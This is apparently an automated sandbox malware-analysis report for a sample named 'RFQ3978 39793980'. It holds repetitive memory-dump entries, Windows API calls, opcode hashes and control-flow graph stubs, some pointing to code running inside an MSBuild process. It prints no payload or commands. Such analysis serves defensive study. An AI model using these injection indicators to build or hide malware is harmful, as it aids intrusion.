                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 025BB09E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2077104771.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_25b0000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D41A02
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2080722045.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4d40000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D41A02
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2080722045.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4d40000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 025B59C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2077104771.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_25b0000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              APIs
                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 04D44111
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2080722045.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4d40000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallProcWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2714655100-0
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 025B59C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2077104771.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_25b0000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025BD6E6,?,?,?,?,?), ref: 025BD7A7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2077104771.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_25b0000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07317D33
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07317D33
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 025BB09E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2077104771.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_25b0000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2076925273.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_f3d000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2080722045.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4d40000_RFQ3978 39793980.jbxd
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2077104771.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_25b0000_RFQ3978 39793980.jbxd
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b62f6a74693c60357d79ce4b42069bec860077d570a747d726e9cc87413b5846
                                                                                                              • Instruction ID: db3cee2c81b78aeccc4e6a31d4b66db2fe8e4b6990afc1fa6527607b39749997
                                                                                                              • Opcode Fuzzy Hash: b62f6a74693c60357d79ce4b42069bec860077d570a747d726e9cc87413b5846
                                                                                                              • Instruction Fuzzy Hash: BF9113B5A1521ACFDB08CF99C58489EFBF6FF89310F249559D419AB720D330AA41CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e7d06f6bfe2c4160a82af70c4f108f43631a098da1db9bdacba15df8ce039f88
                                                                                                              • Instruction ID: 80254aa66171c041d4b788ee74a6b7292f177544be8a1fe77815416d52a03f57
                                                                                                              • Opcode Fuzzy Hash: e7d06f6bfe2c4160a82af70c4f108f43631a098da1db9bdacba15df8ce039f88
                                                                                                              • Instruction Fuzzy Hash: B48113B5A2120ACFDB08CF99C58499EFBF5FF89310F24956AD019AB720D330AA41CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 49f238d372c172c72abfe583883b9acf19619469d317d0064cec9c977a001234
                                                                                                              • Instruction ID: 5440786c78e40b50e31bdb3344168475a5b3f6122c6fe96abf502f138a4946e5
                                                                                                              • Opcode Fuzzy Hash: 49f238d372c172c72abfe583883b9acf19619469d317d0064cec9c977a001234
                                                                                                              • Instruction Fuzzy Hash: 7A810CB4E10159CFDB14DF69C580AAEFBB6BF89304F24C1A9D418A7216D734AA81CF61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4bbd5ef0d53beff343afad429fe709a60d4932c215d47d91ece706b59962159a
                                                                                                              • Instruction ID: 1e2d71a0fb87a6a6d472905ffe219e6c4e7c4967ef13427747c84fe00c3f7708
                                                                                                              • Opcode Fuzzy Hash: 4bbd5ef0d53beff343afad429fe709a60d4932c215d47d91ece706b59962159a
                                                                                                              • Instruction Fuzzy Hash: 3F810DB4D10159CFD714DF69C580AAEFBB6BF89300F24C1A9D418A7316D734AA81CF65
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd9a791f92acda689e54fa4e60ea7d4bd972ed95542f55fa3170d8d1a23a29d2
                                                                                                              • Instruction ID: 9189524c2ad024abb5d3c3f5db7696f701ac2190dad9384a91999c4d17f17d5d
                                                                                                              • Opcode Fuzzy Hash: cd9a791f92acda689e54fa4e60ea7d4bd972ed95542f55fa3170d8d1a23a29d2
                                                                                                              • Instruction Fuzzy Hash: A271F7B4E15609CFDF08CFA9C9805DEFBF6FF89210F24942AD519B7224E3349A518B64
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 839f84b0680b9112e600fc5caa477cb6d697b51574a01ed81935da53ff49c8ba
                                                                                                              • Instruction ID: 395894761b529379fb14749a18d2657d9829345652b99e686251f6efd9ea2525
                                                                                                              • Opcode Fuzzy Hash: 839f84b0680b9112e600fc5caa477cb6d697b51574a01ed81935da53ff49c8ba
                                                                                                              • Instruction Fuzzy Hash: A7710AB4E15609CFDF08CFA9C9815DEFBF2FF89210F24942AD419B7264D3349A518B54
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a32378a5500ec46d1070b425e841c3c46df0419f9a509a84bb14fd6aff837b4f
                                                                                                              • Instruction ID: 917ea9791b4645878b9ecdd3aad21f81ab9429a01215ac922561eda28a402ae9
                                                                                                              • Opcode Fuzzy Hash: a32378a5500ec46d1070b425e841c3c46df0419f9a509a84bb14fd6aff837b4f
                                                                                                              • Instruction Fuzzy Hash: F5416DB4E1520ADFDB48CFA5C5416AEFBF5EB89310F24D86AC108B7254E77497028B98
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3c778e41917714f096b884d47633ec3237ebf6c3cff907951e65613df47568d1
                                                                                                              • Instruction ID: 6aabc605ba1552adb7d3b51b7d39355240f693ebac754686081b3bac132623a4
                                                                                                              • Opcode Fuzzy Hash: 3c778e41917714f096b884d47633ec3237ebf6c3cff907951e65613df47568d1
                                                                                                              • Instruction Fuzzy Hash: 80412AB0E1521ADBDB48CFA9C5816AEFBF6FF88300F20D56AC409F7214D7309A518B95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 97422c9108591bb3ceb4dff003036f6432cbf74c94af802b25b0a8e93de4f475
                                                                                                              • Instruction ID: e6b79c3405324fd3b99e7ca301451182da0db12f28a89e8f14cfb870f7c072af
                                                                                                              • Opcode Fuzzy Hash: 97422c9108591bb3ceb4dff003036f6432cbf74c94af802b25b0a8e93de4f475
                                                                                                              • Instruction Fuzzy Hash: F3413DB0E0521ADBDB08CFA9C4816AEFBF2EF88300F24D46AC409F7214D7349A518F95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09f91733d17d09c026a416c531f4d4307e97100544ee9ed1be30e9337d392cec
                                                                                                              • Instruction ID: edb306eea8e643ba957f43f8bd4b041774e00ece600dd5dc4df25c452824db07
                                                                                                              • Opcode Fuzzy Hash: 09f91733d17d09c026a416c531f4d4307e97100544ee9ed1be30e9337d392cec
                                                                                                              • Instruction Fuzzy Hash: 0D4109B1E1524ADBDB48CFAAD4815AEFBF2EF89300F14C46AD419A7344E7349A41CF94
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 63e5e0a7f66ec0e0ae405e2e91f6ee6d16a804ab33170affeb4e28445096027a
                                                                                                              • Instruction ID: 0020e193520456fe3eb887afb6312efa9c4030dd0bac54d5bcabccf46b4cad34
                                                                                                              • Opcode Fuzzy Hash: 63e5e0a7f66ec0e0ae405e2e91f6ee6d16a804ab33170affeb4e28445096027a
                                                                                                              • Instruction Fuzzy Hash: BC415EB4E1520ADFDF08CFA5C5416AEFBF5EB89310F24986AC108B7264D77497028B98
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fe5b1c00e560334d03c52a4f15c299514fd22b37e3e57727375506c1d450f9e4
                                                                                                              • Instruction ID: a4b377da4e6212e4ad0346e882366660d8a5bba9394deffbcecf9db01bdf1199
                                                                                                              • Opcode Fuzzy Hash: fe5b1c00e560334d03c52a4f15c299514fd22b37e3e57727375506c1d450f9e4
                                                                                                              • Instruction Fuzzy Hash: C041D3B0E1520ADBDB48CFAAD4815EEFBF6AF89300F14C46AD419A7254E7349A418F94
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a988f86c9c1bd9032ba61537433dacd170afa549b970f916370865a895316f37
                                                                                                              • Instruction ID: e749b950b80a837ea2f7f69b3e876e5d7cc20628b1976b7cd52d94de7fe90715
                                                                                                              • Opcode Fuzzy Hash: a988f86c9c1bd9032ba61537433dacd170afa549b970f916370865a895316f37
                                                                                                              • Instruction Fuzzy Hash: F821E9B1E056198FEB1CCF6BD84169EBBF3AFC9200F18C0B6D818A6265DB3405468F51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7ef44730db1e2484cba10daa3af74695f70eb608e5e5a36124dac3dcd1e362f3
                                                                                                              • Instruction ID: b06ff8badc0ccee47a4d6e3bc3b049db23917d93c81ab43cc7228ac51880e6ae
                                                                                                              • Opcode Fuzzy Hash: 7ef44730db1e2484cba10daa3af74695f70eb608e5e5a36124dac3dcd1e362f3
                                                                                                              • Instruction Fuzzy Hash: 611199B1E006189BEB5CCFABD84069EFBF7AFC8200F14C17AD91CA6254EB7406568F55

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.1%
                                                                                                              Dynamic/Decrypted Code Coverage:5.1%
                                                                                                              Signature Coverage:9.5%
                                                                                                              Total number of Nodes:137
                                                                                                              Total number of Limit Nodes:8

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 131 417833-41784f 132 417857-41785c 131->132 133 417852 call 42f523 131->133 134 417862-417870 call 42fb23 132->134 135 41785e-417861 132->135 133->132 138 417880-417891 call 42dfc3 134->138 139 417872-41787d call 42fdc3 134->139 145 417893-4178a7 LdrLoadDll 138->145 146 4178aa-4178ad 138->146 139->138 145->146
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178A5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: f830006e6615140e8580b637796e91e8ab5f34b2beb2de568595537b0918178b
                                                                                                              • Instruction ID: ecafafc67528ff2c0a8c38e8f30d75d0d6e8b2cf75cf3923b583574fb7cade4a
                                                                                                              • Opcode Fuzzy Hash: f830006e6615140e8580b637796e91e8ab5f34b2beb2de568595537b0918178b
                                                                                                              • Instruction Fuzzy Hash: EF0140B1E00109B7DB10EAE1DC46FDEB3789F54308F4041A6E90897240F635EB58C755

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 171 42c843-42c87f call 404883 call 42dac3 NtClose
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C87A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: d2ca64d7c9c952193a798ba580e50a54d6823f4a9d2982a8448f0dd46e0cb6d6
                                                                                                              • Instruction ID: 367e2f773cb965f5ce42092994158f42d79d17829f4288edd670b8861a2249ed
                                                                                                              • Opcode Fuzzy Hash: d2ca64d7c9c952193a798ba580e50a54d6823f4a9d2982a8448f0dd46e0cb6d6
                                                                                                              • Instruction Fuzzy Hash: 1AE04F366402147BD520EB5ADC42F9B779CDFC5760F408529FA08A7241CA71B9008BA4

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 185 1152b60-1152b6c LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: bc70912eddb58c8ec84e8832b1057632a99781501895dcd1638683b48423bff5
                                                                                                              • Instruction ID: 5b6eaa4235d127a0a004f47779db97b8bc6393253d11205d267b302e4d095d97
                                                                                                              • Opcode Fuzzy Hash: bc70912eddb58c8ec84e8832b1057632a99781501895dcd1638683b48423bff5
                                                                                                              • Instruction Fuzzy Hash: 179002A12025000341097158451461A400E97E0201B55C021E5015590DC62689A16225
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: fcf7fdaa2ef7cd45eb9f741595c69ce5b49850ff75971f28490d6d02361d887f
                                                                                                              • Instruction ID: 945bb15a9e74c9176f322739e3747e474a684fee1a2fe0f937942d665f812b3b
                                                                                                              • Opcode Fuzzy Hash: fcf7fdaa2ef7cd45eb9f741595c69ce5b49850ff75971f28490d6d02361d887f
                                                                                                              • Instruction Fuzzy Hash: 2D90027120150413D1157158460470B000D97D0241F95C412A4425558DD7578A62A221
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: ac120ae0c5d8c836ca76579bdafcad31fb2f74cc5a9eca7aab3815da021f9923
                                                                                                              • Instruction ID: f3bcd175eb350b559f734e37e3c7565396fb1128024c07278c9b7f29d6374982
                                                                                                              • Opcode Fuzzy Hash: ac120ae0c5d8c836ca76579bdafcad31fb2f74cc5a9eca7aab3815da021f9923
                                                                                                              • Instruction Fuzzy Hash: 5990027120158802D1147158850474E000997D0301F59C411A8425658DC79689A17221
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 28d3ee007b3dc78f8da78f8421c904dbc3b9e89cdaac4ae98e2d6c8542492bdb
                                                                                                              • Instruction ID: 0ea91a6d57d86fa95667d3bf1f04059187b436ef6871522357c81edc32e0da84
                                                                                                              • Opcode Fuzzy Hash: 28d3ee007b3dc78f8da78f8421c904dbc3b9e89cdaac4ae98e2d6c8542492bdb
                                                                                                              • Instruction Fuzzy Hash: 3D90027160560402D1047158461470A100997D0201F65C411A4425568DC7968A6166A2

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004140FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 7-6E2al6$7-6E2al6
                                                                                                              • API String ID: 1836367815-2814820216
                                                                                                              • Opcode ID: 5deaff572d0f5190d5fcf7c7a8d7add8a85d85076e62a73e8884596ca0f35128
                                                                                                              • Instruction ID: 8964f30d0ad93d8657fde06eb3f9f7b59b907bf4b03a41c1f31d7013d8072a87
                                                                                                              • Opcode Fuzzy Hash: 5deaff572d0f5190d5fcf7c7a8d7add8a85d85076e62a73e8884596ca0f35128
                                                                                                              • Instruction Fuzzy Hash: AA21AC72E041057AD720BBA9DC41EEFBB78EF85358F24806EFA04A7201D62D4D0387D4

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 7-6E2al6$7-6E2al6
                                                                                                              • API String ID: 0-2814820216
                                                                                                              • Opcode ID: 20bc7cafbaeb1015a9a1d73b68b2eab2612c3cefdf3a28a6ffa89f637762eec3
                                                                                                              • Instruction ID: 8e92d5b971038cc737c250f2bb71b05534d94f44fe295e91c63f42aea48a0353
                                                                                                              • Opcode Fuzzy Hash: 20bc7cafbaeb1015a9a1d73b68b2eab2612c3cefdf3a28a6ffa89f637762eec3
                                                                                                              • Instruction Fuzzy Hash: 79212EB2F441187ADB10DAD5AC81DEF77BCEF85354B45416AFB08F7201D1285D428BA4

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004140FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: 7-6E2al6$7-6E2al6
                                                                                                              • API String ID: 1836367815-2814820216
